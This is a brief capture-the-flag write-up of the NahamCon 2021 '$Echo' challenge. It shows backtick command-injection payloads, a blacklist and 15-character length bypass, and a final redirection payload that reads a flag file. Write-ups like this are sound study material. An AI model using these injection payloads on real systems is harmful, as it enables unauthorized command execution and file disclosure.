$Echo Writeup
Nahamcon 2021
It is simple command injection in the input box we can use ` characters
`id`
all commands have to be enclosed in `` chars
now if we list files using
`ls`
we can see index.php
when we
`cat index.php`
we can see the code!
certain characters are blacklisted
we can only enter command less that 15
chars
but there is no flag.txt
here, if we simply execute
`ls ../`
then we can see flag.txt
`cat ../flag.txt`
fails because length of payload exceeds 15
payload to get flag :
linux redirection character! <
is NOT blacklisted!
`< ../flag.txt`